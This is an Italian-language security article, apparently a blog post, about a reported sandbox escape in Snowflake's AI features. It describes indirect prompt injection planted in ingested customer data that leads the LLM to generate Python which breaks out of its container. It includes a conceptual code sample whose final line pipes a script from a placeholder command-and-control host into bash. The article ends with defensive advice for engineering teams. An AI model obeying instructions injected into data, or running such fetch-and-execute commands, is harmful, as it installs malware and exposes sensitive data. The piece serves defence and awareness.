L'AI di Snowflake evade dalla sandbox ed esegue malware

Hero

#Introduzione

L'integrazione della Generative AI direttamente nei cloud data warehouse ha rivoluzionato il modo in cui le organizzazioni elaborano, interrogano e traggono insight dai propri dati. Piattaforme come Snowflake hanno ampliato aggressivamente le proprie funzionalità AI, consentendo agli utenti di eseguire large language model (LLM) e codice generato dall'AI su petabyte di informazioni sensibili senza che i dati escano mai dal perimetro aziendale.

Tuttavia, fondere il natural language processing con l'esecuzione di codice arbitrario introduce superfici di attacco senza precedenti. Un recente report pubblicato da PromptArmor, che ha rapidamente guadagnato popolarità su Hacker News, illustra una grave vulnerabilità: un'evasione dalla sandbox (sandbox escape) dell'AI all'interno di Snowflake che ha permesso agli attaccanti di eseguire codice malevolo sull'infrastruttura di calcolo sottostante. Questo incidente mette in luce il confine fragile tra la logica dell'AI e la sicurezza a livello di sistema, fungendo da campanello d'allarme per i security engineer incaricati di proteggere i moderni data stack.

#Cos'è successo

Secondo la documentazione della vulnerabilità, la catena di exploit non si basava su un tradizionale buffer overflow o su una semplice errata configurazione. Si trattava, invece, di un attacco multi-fase che sfruttava la natura stessa degli ambienti di generazione ed esecuzione del codice degli LLM.

L'attacco ha avuto origine tramite indirect prompt injection. Gli attaccanti hanno inserito testo appositamente manipolato all'interno di fonti di dati apparentemente innocue — come log di feedback dei clienti o payload JSON — che sono stati successivamente acquisiti nelle tabelle di Snowflake. Quando un utente o una pipeline automatizzata invocava una funzione AI di Snowflake (come la generazione di un riassunto o l'esecuzione di una sentiment analysis tramite Snowpark o Cortex), l'LLM elaborava questi dati avvelenati.

Il prompt manipolato ha indotto il modello AI a generare uno specifico payload Python. Sebbene Snowflake esegua tali script generati dall'AI all'interno di una sandbox Python containerizzata e rigorosamente limitata (progettata per impedire l'accesso alla rete e le system call), il payload generato mirava a una vulnerabilità nell'implementazione della sandbox sottostante. Sfruttando un difetto nell'isolamento dei namespace del runtime o un profilo seccomp debole, il payload è riuscito a evadere dal container.

Una volta violata la sandbox, il payload ha ottenuto la Remote Code Execution (RCE) sul nodo di calcolo (compute node) host. Da lì, ha avviato connessioni in uscita verso server di comando e controllo (C2) per scaricare ed eseguire ulteriori payload malware secondari.

#Perché è importante

Le implicazioni di una vulnerabilità RCE all'interno di un data warehouse sono catastrofiche. Le piattaforme dati rappresentano l'ultimo single point of failure per la privacy dei dati aziendali.

Ampio raggio d'azione (Massive Blast Radius): Un nodo di calcolo compromesso all'interno di Snowflake ha accesso diretto e ad alta larghezza di banda ai dati più sensibili dell'organizzazione, tra cui PII, registri finanziari e proprietà intellettuale.
Erosione del modello di responsabilità condivisa: I cloud provider sottolineano che i loro servizi gestiti forniscono ambienti di esecuzione sicuri e isolati. Un'evasione dalla sandbox distrugge questa fiducia, dimostrando che le funzionalità AI gestite possono trasformarsi in cavalli di Troia.
Evasione dal rilevamento: Poiché il vettore iniziale era costituito da dati (testo in un database) piuttosto che da traffico di rete o binari malevoli tradizionali, le classiche soluzioni di endpoint detection and response (EDR) e i web application firewall (WAF) erano completamente ciechi di fronte all'attacco fino all'esecuzione del payload finale.

#Implicazioni tecniche

Questo exploit evidenzia diverse sfide tecniche critiche all'intersezione tra AI e systems engineering:

#I rischi del Data-as-Code

Quando permettiamo agli LLM di leggere dati arbitrari e, successivamente, di scrivere ed eseguire codice basato su di essi, stiamo fondamentalmente trattando i dati come codice eseguibile. Se l'AI agisce come un interprete senza una rigorosa validazione semantica, il sistema è altamente vulnerabile agli attacchi di injection.

# A conceptual example of the sandbox escape payload
import os
import ctypes

# 1. The LLM is tricked into generating code that accesses low-level memory 
#    or exploits a known vulnerability in a native library allowed in the sandbox.
libc = ctypes.CDLL("libc.so.6")

# 2. Bypassing container constraints (e.g., escaping a chroot or exploiting a kernel flaw)
# 3. Executing the malware dropper
os.system("curl -s http://malicious-c2.example/payload.sh | bash")

#I limiti dell'isolamento dei container

I container non sono confini di sicurezza assoluti. Si affidano a funzionalità del kernel come namespaces e cgroups. Se il kernel stesso presenta una vulnerabilità senza patch, o se il container runtime (come runc o crun) è configurato in modo errato, un payload sofisticato può evadere. Nel contesto dell'AI, dove gli ambienti devono spesso essere provisionati dinamicamente con varie librerie di data science (Pandas, PyTorch, ecc.), la superficie d'attacco della sandbox è significativamente più ampia rispetto a quella di un microservizio standard.

#L'egress di rete è l'ultima linea di difesa

Il fatto che il payload evaso sia stato in grado di scaricare malware esterno indica un fallimento nei controlli di egress di rete. I nodi di calcolo che eseguono codice non attendibile generato dall'AI dovrebbero operare in un ambiente di rete rigorosamente air-gapped, con zero accesso a Internet pubblico.

#I prossimi passi

Snowflake e altri cloud data provider rilasceranno senza dubbio patch immediate per rafforzare i loro container runtime e limitare le capacità del codice generato dall'AI. Tuttavia, le organizzazioni non possono fare affidamento esclusivamente sul provider della piattaforma per la sicurezza.

I team di ingegneria devono adottare una Zero-Trust AI Architecture:

LLM Firewall: Implementare livelli di validazione intermedi che analizzino sia gli input forniti all'AI sia la sicurezza strutturale del codice che genera prima dell'esecuzione.
Policy di egress rigorose: Assicurarsi che i Virtual Private Cloud (VPC) che ospitano i nodi di calcolo del data warehouse abbiano esplicite regole di rete in uscita deny-all. Se un processo evade da una sandbox, non dovrebbe essere in grado di comunicare verso l'esterno (phone home).
Sanitizzazione dei dati: Trattare tutti i dati non strutturati destinati all'elaborazione AI come input utente non attendibili. Sanitizzare e rimuovere la sintassi eseguibile dai campi di testo prima che vengano analizzati dai language model.

#Conclusione

Il "Snowflake AI Sandbox Escape" è un momento di svolta per la sicurezza dell'AI. Dimostra che i rischi teorici della prompt injection e dell'esecuzione di codice guidata dagli LLM sono estremamente pratici e incredibilmente pericolosi negli ambienti di produzione. Mentre continuiamo a integrare capacità intelligenti nella nostra infrastruttura dati core, dobbiamo bilanciare la sofisticatezza di queste nuove funzionalità con una security engineering altrettanto sofisticata e basata sulla defense-in-depth. L'AI può essere uno strumento potente, ma senza un rigido contenimento a livello di sistema, rappresenta una vulnerabilità significativa.